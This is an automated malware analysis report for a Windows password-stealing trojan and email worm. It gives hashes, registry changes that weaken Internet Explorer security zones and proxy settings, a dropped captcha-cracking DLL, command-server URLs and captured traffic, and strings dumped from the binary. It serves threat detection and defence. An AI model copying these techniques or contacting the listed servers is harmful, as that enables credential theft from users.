Trojan.Generic.12934796_56ad8324dc

by malwarelabrobot on June 22nd, 2015 in Malware Descriptions.

Trojan.Generic.12934796 (B) (Emsisoft), Trojan.Generic.12934796 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 56ad8324dcba2017a30b74607de9efb2
SHA1: 931e447082103ddc7aa9f2af492c60c7ea3007ab
SHA256: 037e5c043cd6cadfbcd32267ccb4b158f5c8888604f5e357a1b8c5e6d2bd546f
SSDeep: 49152:YezLnokNCj02YWWwmX4N2hbYiPTUQmJTaR0SRFj:xLokNWhYXX4NuEml
Size: 2793472 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: ???
Created at: 2015-03-11 17:53:03
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:464

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
C:\CrackCaptchaAPI.dll (7972 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@12345ee[1].txt (201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].txt (1560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

Registry activity

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 F7 D2 09 B7 0B 6C 5D 8D 1A 61 F6 EE 77 40 B2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
9a4965011a94705227f62df0776f2ab6 c:\CrackCaptchaAPI.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 894147 897024 4.44695 931518ba5d557b321d9397dbd621b4d4
.rdata 901120 1782740 1785856 4.56341 b07eeb774082b9dc94549482a558054a
.data 2686976 382027 73728 3.62404 04601570b60158fc0ea5264cdcdaabdf
.rsrc 3072000 29616 32768 3.23833 d743aad7b46927e651369b13499d7af1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.12345ee.com/YZM/1.asp 112.124.44.208
hxxp://www.12345ee.com/a/shuoshuo.asp 112.124.44.208
hxxp://www.12345ee.com/m/test.txt 112.124.44.208
hxxp://www.12345ee.com/a/2.asp 112.124.44.208


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /m/test.txt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hXXp://VVV.12345ee.com/m/test.txt
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Date: Sun, 21 Jun 2015 13:55:50 GMT
Content-Length: 50878
Content-Type: text/plain
Content-Location: hXXp://VVV.12345ee.com/m/test.txt
Last-Modified: Sun, 21 Jun 2015 07:26:29 GMT
Accept-Ranges: bytes
ETag: "8c893c97f3abd01:1b03"
Server: IIS
X-Powered-By: WAF/2.0
62mSb0NS8Z80BYTS80aU..ZQ738ZYTaY9YTTbZa1539Z..SQRQTT80Y3aZ83b02Y50Y29Y
7082..6200a3aY2Y42912Y826Y..aYaZa3bY00bYZ2436183..7QOQ5TTVFQ52628Z73..
a1b1aY3Z6Y5Y2Z932Z01..PQ8UHT8VTVLVSUIVPTSVPR..iCZDxF5DBJYE80528Y50a2..
PTIUJVMQHQSUa1bY628Y..IRSQSSLTqQETRRYS..FSIS4QZS3TETMSHV..FULROUHTEVGU
PVHT0TGVPR..8YY3a05380a361Z38Z..KVHVHSQUYS3TER01..zBmF73b0b15040615Z01
..VULQRTIVQU73a1536Z51..b0a1634Y5Z7051927092..HULRPVb0XUGU423V7Ta3..JS
2SEV2SSQHSJQLRPV..JS9V9THUKQVUJSHTER..FT3Tb1835383535Y425Y..3VGV8ULRSV
PVGTa250Z23Y..61b343105270118Z..PVORLVGUHS9142b371Z3..XV0Q739Ya0a3515Y
..HUFUGR80Y2101091bZ9143..ZT1RMV734YZ2Y391932Z01..KTEQ0QES8Q729073..8Q
9QFRJVaZ8173bZ..629ZZ36YY39Z3YbZZ33Z01..VU919Y1Q809YQQ918Za042MQES..SV
OTQUSVNQNUMQNSRUMQNSRURQOS..80b053b27Z619R4U..aY4353b27Z839R7T73..738Z
b17Yb3834U9R73bZ..73a39141734180a391a3..PVQS9Z10b19Z91a34Z1143..STNUb1
Y3b15391b270Y29Y..1RUV5TET618091aZ71b3..5TRTIVOSWURTJUOS..WU4001JS512Z
YTb32Z..109Za052a38Y3YWULQZS..8Q5VaYa0Z3104391637Z41b3..ETGS4TSU4VOUJU
MVHTXV..b090725290717172..HQIS5VGUERQUMRSUHSQU..1RNTZT4211a3Y2a301432Z
b1..5TQSFQMQ4SOQHV1S..PQ9U9RKVRTIU2UGVJT..NSTUTURUNQOT81aY..b17Z2Y4042
3ZY39Z51..SQ9TPQRUOU8SMTMR..3R3R3R526262b24351..2QTVKQ7RJSTRHS9TKRJT..
ETIUIVOS1SHVIVIS4Q..1SIS1RIU5RQQNTEQ..7T5V42a06161112YY2..8Q6S429Z5Y5Y
Z3002Y00..8Q5Va0425Y92112YY22Y00..8Q8Qb1b15Y702Y3ZZ33Z11Z3..6S6Sb19Z70
4ZY23ZZ33Z11Z33Z..NQ3T7QTVESTURTIU..HQHVYSEQHSQU0Q2SZ23Y..ETLRQSFQNRRV
PR91a1..WU8UOQ9TGVRTJUOS..7THVJUQUFSGUFQNSIUFQOS..IRJTIVHSGUOUJUQVOT..
7370b2b28391Z36Z51..6VHV6T01929081aZ81..KTJQ4S9Y63aZ6380..1SKRRTFQ
<<< skipped >>>


GET /a/shuoshuo.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:55:47 GMT
Content-Length: 1
Content-Type: text/html
Server: IIS
X-Powered-By: WAF/2.0
2HTTP/1.1 200 OK..Cache-Control: private..Date: Sun, 21 Jun 2015 13:55
:47 GMT..Content-Length: 1..Content-Type: text/html..Server: IIS..X-Po
wered-By: WAF/2.0..2....


GET /a/shuoshuo.asp HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:55:48 GMT
Content-Length: 1
Content-Type: text/html
Server: IIS
X-Powered-By: WAF/2.0
2..



GET /YZM/1.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:55:31 GMT
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; path=/
Server: IIS
X-Powered-By: WAF/2.0
Set-Cookie: safedog-flow-item=8968783A30548B64CAD4B5988F474F1F; expires=Dec, 21-Jun-2015 15:59:31 GMT; domain=12345ee.com; path=/
4....



GET /a/2.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:56:12 GMT
Content-Length: 1089
Content-Type: text/html
Server: IIS
X-Powered-By: WAF/2.0
633457001*1(QQ......)..633457001*2(QQ..........)..633457001*3(........
....)..63345700104(............)..633457001*5(..........)..63345700106
(QQ........)..63345700107(........)..63345700108(........)..6334570010
9(..........)..633457001*1(QQ......)..633457001*2(QQ........)..6334570
01*3(QQ......)..63345700114(..QQ)..633457001*5(QQ......)..63345700116(
............)..63345700117(............)..633457001*8(........)..63345
7001*9(........)..633457001*2(....@....)..633457001*3(........)..63345
700120(........)..63345700121(........)..63345700122(............)..63
345700123(QQ........)..633457001*4(QQ............)..63345700125(QQ....
........)..63345700126(........)..633457001*8(........)..633457001*7(.
.......)..63345700129(........)..63345700130(........)..633457001*1(..
QQ....)..63345700132(........)..633457001*3(..QQ....)..633457001*4(..Q
QPC)..633457001*5(QQ..........)..63345700145(QQ......)..633457001*6(QQ
....)..633457001*7(QQ......)..63345700148(............)..63345700149(.
.........)..63345700150(QQ............)..11111111111111111111111111111
111111111111..88888888888............

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_464:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
CrackCaptchaAPI.dll
wininet.dll
ole32.dll
kernel32.dll
WinINet.dll
user32.dll
shlwapi.dll
Kernel32.dll
advapi32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
Login
EnumWindows
HttpAddRequestHeadersA
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
\CrackCaptchaAPI.dll
@.reloc
9.tdj.h
hCRTkP
hCRTrS
hCRTgS
hCRTbS
CRTr
CRTg
CRTb
lFtP
tcpO
tcpOt1
tcpOtQ
tcpOtN
tcpOt.
operator
GetProcessWindowStation
Multipage Encode, Unsupported operation for this format
Page %d
Save PSD not supported
Save RAW not supported
Save WMF not supported
Unsupported WBMP type
1.5.0
compression type not supported
Portable Graymap/Pixmap (PNM)
? %s %s %d %ld %ld
error: BMP format does not support color space
tileno = %d; len = %d; partno = %d; numparts = %d
prec[%d] = %d; sgnd[%d] = %d; hsamp[%d] = %d; vsamp[%d] = %d
tilewidth = %d; tileheight = %d; tilexoff = %d; tileyoff = %d;
width = %d; height = %d; xoff = %d; yoff = %d;
caps = 0xx;
prcwidth[%d] = %d, prcheight[%d] = %d
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx;
prg = %d; numlyrs = %d;
numdlvls = %d; qmfbid = %d; mctrans = %d
csty = 0xx;
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx; qmfbid = %d;
compno = %d; csty = 0xx; numdlvls = %d;
compno = %d; roisty = %d; roishift = %d
expn[%d] = 0xx; mant[%d] = 0xx;
qntsty = %d; numguard = %d; numstepsizes = %d
compno = %d; qntsty = %d; numguard = %d; numstepsizes = %d
seqno = %d;
ind=%d; len = %d;
le[%d] = %d
rs[%d] = %d; re[%d] = %d;
cs[%d] = %d; ce[%d] = %d;
po[%d] = %d;
hoff[%d] = %d; voff[%d] = %d
regid = %d;
len = %d;
type = 0xx (%s);
Creator: JasPer Version %s
lyrno=d cmptno=d rlvlno=d bandno=d prcno=d cblkno=d passno=d
lyrno = d
success %d goodthresh %f
MbP?maxlen=ld actuallen=ld thresh=%f
min rdslope = %f max rdslope = %f
cblk ] ] ] ]
prc ] ] ] ] (] ])
band ] ] ] ]
rlvl ] ] ] ]
tcmpt ] ] ] ]
invalid code block width %d
invalid code block height %d
warning: ignoring invalid option %s
warning: invalid intermediate layer rates specifier ignored (%s)
ignoring bad rate specifier %s
ignoring invalid progression order %s
ignoring invalid mode %s
unsupported image type
error: too few guard bits (need at least %d)
CODE BLOCK %d
CODE BLOCK GROUP %d
BAND %d
xs =%d, ys = %d, xe = %d, ye = %d, w = %d, h = %d
RESOLUTION LEVEL %d
ICC Profile CS x
error: unsupported compression type
box type %s
warning: palettized images not fully supported
error: encoding method not supported
error: RLE encoding method not supported
error: unsupported color space
unsupported BMP encoding
error: unsupported BMP encoding
THE BMP FORMAT IS NOT FULLY SUPPORTED!
no palettized image support for BMP format
%s%ld
warning: support for signed sample data requires use of nonstandard extension to PNM format
data=%s
component tlx=%ld tly=%ld sampperx=%ld samppery=%ld width=%ld height=%ld prec=%d sgnd=%d
error: PNM support required
warning: ignoring unsupported options
(%f, %f, %f)
entry[%d] = %f
gamma = %f
number of entires = %d
maclen = %d
sccode = %d
uclangcode = %d; uclen = %d
ascii = "%s"
string = "%s"
numintabents=%d, numouttabents=%d
e[%d][%d]=%f
numinchans=%d, numoutchans=%d, clutlen=%d
x:
1.900.1
packet offset=ld prg=%d cmptno=d rlvlno=d prcno=d lyrno=d
coding pass failed passtype=%d segtype=%d
csid=%d
method=%d; pri=%d; approx=%d
channo=%d; type=%d; assoc=%d
cmptno=%d; map=%d; pcol=%d
numchans = %d
LUT[%d][%d]=%d
numents=%d; numchans=%d
type=%c%s%c (0xx); length=%d
%s: Out of memory in %s
?%s: decoder table overflow
%d.%d.%d
%d %d
%d,%d
%d %d %d
/.badpixels
%s is not a valid PGM file!
%s has the wrong dimensions!
Scaling with darkness %d, saturation %d, and
%s: Cannot use camera p->white balance.
Median filter pass %d...
11124811248488
012347800000005896
%d:%d:%d %d:%d:%d
@0134567028
023457000000006000
012346000000000000
.Ad530flex
%d:%d:%d
%*s %s %d %d:%d:%d %d
v%d %dx%d
A%s %s
Converting to %s colorspace...
?d:d:d d:d:d
12435867
?Unknown option "-%c".
Non-numeric argument to "-%c"
114111111422
%f %f %f
Ixpress %d-Mp
50132467
Failed to read metadata from %s
Reading metadata from %s ...
%s: You must link dcraw with libjpeg!!
%dx%d
1.2.5
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
Bogus message code %d
%ld%c
?0123456789ABCDEFlibpng warning: %s
libpng error: %s
Buffer error in compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Incomplete compressed datastream in %s chunk
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%d, gy=%d, bx=%d, by=%d
wx=%d, wy=%d, rx=%d, ry=%d
incorrect gamma=(%d/100000)
Ignoring iCCP chunk with declared size = %u and actual length = %u
NULL row buffer for row %ld, pass %d
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
%s: Must set "PlanarConfiguration" before writing data
%s: No space for %s arrays
%s: Must set "ImageWidth" before writing data
%s: File not open for writing
%s: No space for output buffer
%s: No space to expand strip arrays
%d: Sample out of range, max %d
Integer overflow in %s
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
Failed to allocate memory for %s (%ld elements of %ld bytes each)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: wrong data type %d for "%s"; tag ignored
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
%s compression support is not configured
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
%s: %s
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
Row pixels integer overflow (rowpixels %u)
%s: No space for Group 3/4 reference line
C Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
?#%X.y
Broken pipe
Inappropriate I/O control operation
Operation not permitted
\\.\Scsi%d:
\\.\PhysicalDrive%d
,./1234567
Referer:%s
Cookie: %s
CInternetFileOperator
InternetOpen(%s) failed
InternetOpenUrl(%s) failed(err=%d, header=%s)
HttpQueryInfo(%s, %d) failed(err=%d)
Request URL(%s) return %s
HttpQueryInfo(%s, ContextType) failed(err=%d)
ReadInternetFile(%s, ContextType=%s) failed
Alloc cookie memory failed(len=%d)
InternetReadFile(%d) failed(err=%d)
Alloc file memory failed(datalen=%d, retlen=%d)
FIELD_ID_NEW_PASSWORD
FIELD_ID_FILE_SERVER_PORT
FIELD_ID_MAIN_SERVER_PORT
FIELD_ID_FILE_URL
FIELD_ID_FILE_URL_LEN
FIELD_ID_KEY
FIELD_ID_PASSWORD
ip=%s
C:\work\VCodeServer\Common\include\IPacketDataWriterImpl1_0.h
Login_Req
Login_Rsp
AppReportVCodeRight_Req
AppReportVCodeRight_Rsp
[%7lu]Get packet define failed(seq=%lu, cmd=%lu)
[%7lu]Get packet define and session data failed(seq=%lu, cmd=%lu)
[%7lu]Set offset error(seq=%lu, cmd=%lu)
[%7lu]MAC error(seq=%lu, cmd=%lu)
[%7lu]Packet fixed length error(dwFixLen=%d)
[%7lu]Packet head VCC Verify error(src=%d, comp=%d, seq=%lu, cmd=%lu)
[%7lu]Command(%d) not support(seq=%lu)
[%7lu]Packet length(%d) error(seq=%lu, cmd=%lu)
